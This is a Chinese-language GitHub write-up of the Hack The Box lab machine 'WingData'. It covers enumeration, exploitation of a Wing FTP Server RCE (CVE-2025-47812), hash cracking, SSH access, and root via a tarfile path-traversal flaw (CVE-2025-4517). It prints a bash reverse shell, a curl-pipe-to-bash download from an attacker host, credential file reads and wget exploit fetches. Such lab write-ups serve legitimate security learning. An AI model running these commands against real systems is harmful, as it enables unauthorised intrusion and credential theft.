karimelsheikh1/HTB-WingData-Writeup
GitHub: karimelsheikh1/HTB-WingData-Writeup
一篇针对 Hack The Box WingData 靶机的完整渗透 Writeup,演示了从 CVE-2025-47812 未授权 RCE 到 CVE-2025-4517 提权的全链攻击过程。
Stars: 0 | Forks: 0
# HackTheBox - WingData Writeup
**难度:** 简单 | **操作系统:** Linux | **赛季:** 10


## 总结
WingData 是一台简单难度的 Linux 机器,展示了从
未授权服务利用到 root 权限提升的完整攻击链。
**攻击链:**
RCE (CVE-2025-47812) → 凭据提取 → 哈希破解 → SSH → Root (CVE-2025-4517)
## 枚举
### Nmap
```
nmap -sCV -A 10.129.244.106
```
**开放端口:**
- 22/tcp — OpenSSH 9.2p1 (Debian)
- 80/tcp — Apache 2.4.66 → 重定向至 `wingdata.htb`
### /etc/hosts
```
echo "10.129.244.106 wingdata.htb ftp.wingdata.htb" | sudo tee -a /etc/hosts
```
### 目录模糊测试
```
ffuf -u http://wingdata.htb/FUZZ -w /usr/share/wordlists/dirb/common.txt \
-mc 200,301,302,403 -t 40
```
重要发现:`/assets`、`/vendor`
### FTP 子域名
浏览 `http://ftp.wingdata.htb` 发现:
**Wing FTP Server v7.4.3** — 存在 CVE-2025-47812 漏洞
## 初始访问 — CVE-2025-47812 (未授权 RCE)
```
git clone https://github.com/4m3rr0r/CVE-2025-47812-poc.git
cd CVE-2025-47812-poc
```
启动监听器:
```
nc -lvnp 5555
```
提供 Payload 并进行利用:
```
echo 'bash -i >& /dev/tcp/YOUR_IP/5555 0>&1' > /tmp/shell.sh
cd /tmp && python3 -m http.server 8080
python3 CVE-2025-47812.py -u http://ftp.wingdata.htb \
-c "curl http://YOUR_IP:8080/shell.sh|bash" -v
```
以 `wingftp` 用户身份接收到 Shell。
## 凭据提取
```
cat /opt/wftpserver/Data/1/users/wacky.xml
```
提取到的哈希:
### 哈希破解 (Hashcat)
```
echo "HASH:WingFTP" > wacky.txt
hashcat -m 1410 wacky.txt /usr/share/wordlists/rockyou.txt
```
**破解成功:** `*********^*Bride5`
## 横向移动 — 以 wacky 身份进行 SSH
```
ssh wacky@10.129.244.106
# password: !#*********Bride5
cat ~/user.txt # User flag ✅
```
## 权限提升 — CVE-2025-4517
### Sudo 枚举
```
sudo -l
# (root) NOPASSWD: /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py *
```
备份还原脚本以 root 身份运行,且不安全地使用了 `tarfile.extractall()`,
允许恶意的 tar 归档文件覆盖 `/etc/sudoers`。
### 漏洞利用
```
# 在 Kali 上
git clone https://github.com/AzureADTrent/CVE-2025-4517-POC-HTB-WingData.git
cd CVE-2025-4517-POC-HTB-WingData
python3 -m http.server 80
# 在目标上
cd /tmp
wget http://YOUR_IP/CVE-2025-4517-POC.py
python3 /tmp/CVE-2025-4517-POC.py
```
### Root Shell
```
sudo /bin/bash
id # uid=0(root)
cat /root/root.txt # Root flag ✅
```
## 引用的 CVE
| CVE | 描述 |
|-----|-------------|
| CVE-2025-47812 | Wing FTP Server v7.4.3 未授权 RCE |
| CVE-2025-4517 | Python tarfile 通过不安全提取实现路径穿越 |
## 使用的工具
- nmap
- ffuf
- netcat
- hashcat
- Python3
*Writeup 由 [KARIM ELSHEIKH] 提供 — HackTheBox 第 10 赛季*
标签:CISA项目, CTI, CVE-2025-4517, CVE-2025-47812, FTP漏洞, HackTheBox, Hash破解, IP 地址批量处理, RCE, SSH, WP, Writeup, 协议分析, 反弹Shell, 大数据, 权限提升, 横向移动, 漏洞复现, 目录扫描, 编程规范, 网络安全, 网络安全审计, 隐私保护, 靶机攻略